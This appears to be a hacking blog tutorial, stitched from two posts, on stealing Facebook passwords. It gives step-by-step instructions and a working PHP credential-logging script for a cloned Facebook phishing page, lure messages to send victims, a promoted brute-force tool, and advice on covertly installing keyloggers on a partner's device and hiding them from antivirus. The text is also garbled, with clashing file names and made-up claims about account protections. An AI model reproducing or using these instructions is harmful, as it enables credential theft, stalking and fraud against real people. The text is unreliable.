Ever heard about Phishing page and Phishing Attack? Today I’m going to show you how to create a Phishing page & How to do Phishing Attack step by step full tutorial. So, do you know
Hack Facebook with a Phishing method 3.1. How to make a Facebook phishing page. Using a special software “Tool v.2.9.0.” Download link is below. At this time this is the most reliable method to get login password of almost any existing Facebook account. How this is even possible? Facebook has today announced a new way in which it hopes to combat phishing scams targeting its 955 million users. In a post to its Facebook Security page, the social network has explained that.
Table Of Content
- 1 What is Phishing Page?
- 1.3 How to make a php script?
This Tutorial is for Education Purpose only!!!
Phishing is a technique by which we create a similar web page(Phishing Page) to the original one. In this technique, we copy original website page code and do some changes to it. Then upload it to the hosting and access it from anywhere.
Here is the list of things that you will learn from this post
- How to copy the code from the original website
- How to do some changes in this code
- How to make a php script
- How to upload it to the Hosting
- and a lot more !!!
Umm!!! Interested to read further ?? I’m sure you will like this tutorial and you want this tutorial. 😛
DON’T MISS:- web.whatsapp.com Hack Tutorial Step by Step Explanation
How to copy the code from the original website
Open a website of which Phishing page do you want then press ctrl+U to open its source code file. For ex:- I’m copying the code of Facebook.com and then I will make a facebook phishing page. Well, this is what which you want …Right!! 😛
So I’m copying the source code from Fcaebook.com by pressing ctrl+U. You can see here the source code from Facebook.com is shown here.
The only thing you have to do is to select all code and then copy this code by pressing ctrl+A and then ctrl+C and then open a notepad file and paste it there by pressing ctrl+V.
You can see here I pasted down the whole code from website to my notepad file.
How to do some changes in this code?
Now, you have to find this line by pressing ctrl+F and type this whole line there and press Enter.
action=”https://www.facebook.com/login.php?login_attempt=1&lwv=110″ method=”post”
Let’s do some changes, You can see the path of Facebook is shown here. Copy this whole path and replace it with login.php and also change the method from post to get. and save this notepad file with the name fb.html.
How to make a php script?
Do you know Php Language? Well, If you don’t know anything about Php Language then no problem but in the future, I recommend you to learn this language. So, I’m giving you a PHP code which will save the username password which is entered on our fb.html page. and it also saves different username and password to a new line. When the victim enters his username and password to it then this PHP script will redirect that user to the original Facebook page.
So, here’s the Php script
<?php
header(“Location: https://www.facebook.com”);
$handle = fopen(“logs.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
Just copy this script and paste it down to your notepad file and then save this file with a name hack.php
One more thing creates a blank notepad file with a logs.txt name on which victim’s usernames and password will save.
Now, you have three notepad files one is none.html and second is login.php and third is logs.txt. Just copy all files and save it to a new folder.
How to upload Facebook Phishing Page to the Hosting?
Let Understand what is Hosting and Domain. To open a website we must have a domain, hosting. So, Domain is the name of our website. For ex :- I have Hackingblogs.com This is my domain. and the location where this domain has parked this location is known as hosting.
Still Confused!! Let’s Understand with an Example, Whenever we open a new store then we have to decide two things
- Store’s Name
- Land/room
Similarly, For opening a website we need Domain for a website which is unique. and the second one is the land which is hosting on the Internet. Hosting and Domain are paid and some websites also provide this hosting and domain at free of cost.
Here’s the list of Free hosting providers website.
- and many more…
I’m using 000webhost here. So, open this website and do sign up there. In the field of a website, name leaves it blank.
and now you have to take a domain which looks similar to Facebook. If you don’t know about creating a similar word the same as the original one. Check my earlier post.
I’m sharing some website link which provides free domains.
You can use any of them to register a domain for free. Now, come to the hosting. You can use any of the websites. Now, the post is becoming so long so, at 29 April I will upload Its second part in which I will show you how to attach domain and hosting and also tell some tricks which nobody tells you. 🙂 So, do subscribe to the new post. Good Bye 🙂
This is the Second Part:- How to Upload a Phishing page on Hosting | Phishing Page Part 2
Almost any internet user at least once in their life thought about to hack Facebook password of someone from their friends list. This is not case just with FB, but with any other social network account too.
In most cases it’s about people who are in relationship who wants to check out if their partner is cheating on them. So their goal is to break inside a Facebook account and read messages and chat logs with any suspicious people to find out the truth.
But in overall reasons are different. Some people just forget their login details, including their email address too. So without it it’s almost impossible to get an account back. Some people get hacked, and so on.
Today we are going to show you the working and tested methods to hack into a Facebook account, ranked from most reliable one to less.
How accurate are these methods? That depends on which way you decided to go for. Some of these are doing the job by itself, like cracking tools. So all you have to do is to enter a details and let the application do its job by itself.
However some methods require a bit of thinking and tricking your victim to fail on your “trap” in aim to get their password.
So let’s get started.
Quick navigation:
1. With using a special software Tool v.2.9.0.
2. With a Keylogger
3. Hack Facebook with a Phishing method
3.1. How to make a Facebook phishing page
1. Using a special software “Tool v.2.9.0.”
At this time this is the most reliable method to get login password of almost any existing Facebook account.
How this is even possible?
An anonymous group of programmers who are hacking online accounts on marketplace section of well know HackForums.net decided to make something in return for they fellows to celebrate their decade of successful hacking existence.
This freeby they called the Tool v.2.9.0, which is an application made to crack Facebook passwords using a customized well known brute-force method.
For those who don’t know a brute-forcer is a tool which attacks a login page with hundreds or even thousands attempts of possible combinations of usernames and passwords previously added into textual file which user needs to connect with a bruteforcer. Those passwords can be randomly created by a software or manually typed. A stronger and faster bruteforcers requires more CPU power.
What is different with the Tool v.2.9.0. is that it has a special method of bruteforcing added inside. And a difference is that an IP address gets changed after every 3 unsuccessful login tries. This is because Facebook security system will block you from further logging in if you fail to get into your profile 3 times with a false password. You will have to wait few hours to try again. And if you fail to login successfully again, your account can even get locked and then you will have to confirm your real identity by uploading some of your ID documents to Facebook representatives to confirm you are a legitimate owner of your profile.
Why some FB accounts can’t be hacked with this program?
Some accounts are protected then others of “normal Facebook users”. For example accounts of Mark Zuckerberg and many other well known celebrities with a blue tick icon as a prefix before their name has an extra decrypted system inside their accounts source code which automatically recognizes any hacking attempt done by a software.
But hacking any account of normal users still works fine.
NOTE: Keep in mind that these brute-forcing apps often gets patched and stop working after some time when official spam team detects they’re dangerous and decide to do something to stop it in aim to protect their users’ privacy and safety.
So until then we will be checking regularly if the Tool v.2.9.0. still works or not. And if it gets patched we will add notification here that it got blocked.
Status: Still working
Tested on: June 16, 2020.
You can download Tool v.2.9.0. from its official website by clicking the button below.
App works on Windows, Mac, Android APK and iOS. You can choose your version at downloads page.
2. Using a Keylogger
First let’s clear what a keylogger actually is (For those who don’t know).
This is an application which monitors keystrokes typed on a keyboard and saves these logs in a textual documents which can be automatically uploaded to admin’s email (or some other kind) online account.
Purpose of keyloggers existence are various, like to help monitoring children for their safety, to keep an eye of employees inside a company, or just to store your own personal logs for safety. And of course in our example is to spy other people in aim to find their Facebook password.
Keyloggers can be manually installed on a device or remotely. And they are available as desktop and mobile applications.
So if you’re thinking about how to hack someones Facebook account with a keylogger your main goal is to successfully install it into your victim’s device (Smartphone or PC).
To manually install it, you need to have a physical access to their phone or computer. Catch a right moment when a person goes somewhere, like on toilet etc, to grab a chance and plant your precious seed inside their device.
Keep in mind to open their antivirus software (If they have it installed) to add your keylogger to trusted zone because else it can soon be detected as a malware and deleted. Because antiviruses detects these kind of apps as spyware (which they actually are). Only some rare HQ keyloggers are FUD (Fully Un-Detectable) by all antiviruses. But for these you have to pay big price. Others low budget or free ones are often detected by a high rate by most of antivirus software.
After you’re done with this hardest step above, you’re ready to begin monitoring logs. As soon as your potential victim logins to their FB profile with a login information, you’ll be able to see their password inside a log.
Our recommendation would be not to get FB password only, but go for their email account password as well. This way if you have an access to their e-mail account which they’ve used to sign up for Facebook, even if they change their Facebook password you can always get it back if you have an access to their email as well.
What keyloggers are best to use?
We recommend Ardamax for desktop use and MSpy for mobile phones. However feel free to use any other if you think it’s better for your needs.
But make sure to always download them from official websites because keyloggers uploaded on other free-to-get sources are in 99% cases backdoored with other spyware which will infect your own device. So you will become a victim of your own trap. Be very careful!
3. Hack Facebook with a Phishing method
Phishing is a way to trick user to login to a fake website which looks exactly like an official one from where you want to get their password. Here we are talking about Facebook.
So our goal will be to make our victim think they’re logging into real Facebook home page.
How we are going to make them do this?
You need to think outside the box. But some already popular methods are sending them an email, WhatsApp, SMS or some other kind of message which says something like “Confirm you are active Facebook user by logging from this link” And the link is your phishing link which leads to a false Facebook login page. You will learn how to make a “phisher” in a next paragraph below.
However you can choose some other trick which works best for you. Just make them think they need to login to their FB account because of “something” important. Like to confirm their ownership or something else. Use your head 🙂
How to make a Facebook phishing page
Step 1:
Go to www.facebook.com (You need to be log out of your account). Refresh a page if you just logged out.
Now press a right click on your mouse somewhere on the page (Or press CTRL+U on your keyboard) and click “View page source”. In a new tab you’ll be able to see the whole source code of Facebook login page.
Select the whole text (CTRL+A) and copy it (CTRL+C or mouse right click > Copy).
Step 2:
Open your Notepad program (Start > Programs > Notepad) and in a new window paste the text you copied from the Facebook source page (CTRL+P or mouse right click > Paste).
Step 3:
Now with your mouse left button click to the top above the text inside the Notepad, then press CTRL+F and in a search box type “action=” without quotation marks, and click the “Find next” button.
There are two “action=” in the whole text. You need the first one. You can see how it looks in the picture below.
Replace the link inside the quotation marks you can see in the picture below with the “post.php”. Do not touch the quotations but only the text inside, as you can see in the examples below.
Now go to File > Save as and name your file “index.html”. Also make sure to set the encoding option to “Unicode”. See how it looks like in the pic below.
Step 4:
Now you need the post.php file. You can download it here.
Don’t forget to unzip it from the archive .rar file before uploading it to a server in the next step.
The password to open this .rar archived file is “OpenMe123”.
You’ll need the WinRar program to open this file. If you don’t have it installed, you can download it here.
Step 5:
Now you need to have two files, index and post ones.
You need to upload these to your web hosting account. There are free and payed hosting options. If you don’t have a paid hosting already you can register yourself a free one at www.000webhost.com.
(NOTE: Hosting is used to host files if you have a website. Since phishing page is also some kind of website, you should register yourself a hosting account, in this example at www.000webhost.com)
After you’re done with registration at www.000webhost.com, go to the “File Manager” folder. Inside you should see an empty “public_html” folder. In that folder upload two files “post.php” and “index.html”.
Now you are ready to test your phisher. After you registered your www.000webhost.com account you needed to make your unique username and get your custom link. Go to that link now and you should see a Facebook home page. If you can’t, means you did something wrong. Check all the steps again and try to fix your mistake.
If you still need help, feel free to comment about your problem below and I’ll be glad to assist you for help.
After someone types their login details inside your phishing page, you can find their FB login info inside a new created file called “usernames.txt” inside a same folder where first two files are uploaded.
And now you are ready to spread your link to your friends and catch their passwords!
I hope you found this guide helpful. As of today these are the most reliable and working methods to hack Facebook password successfully. If some new ones gets released they’ll be included here too.
Thanks for reading and have a nice day!
Disclaimer
Facebook Phishing Site
Since I’ve noticed many people misuse this information in wrong manners which I didn’t approved when I shared this tutorial, I have to protect myself legally and write next disclaimer policy down.
By reading this tutorial you’re agreeing to use learned information for educational purposes only, which means you will only use it to recover back your own FB account of which you’ve forgot password or your account got lost by other reasons.
Using this tutorial in illegal activities, which is hacking Facebook accounts of other people without their prior permission is against law in every country. And by doing so you are doing it at your own risk.
Facebook Phishing Page Link Icon
WebRevelador is not responsible for any unallowed and illegal usage of information contained in this this tutorial.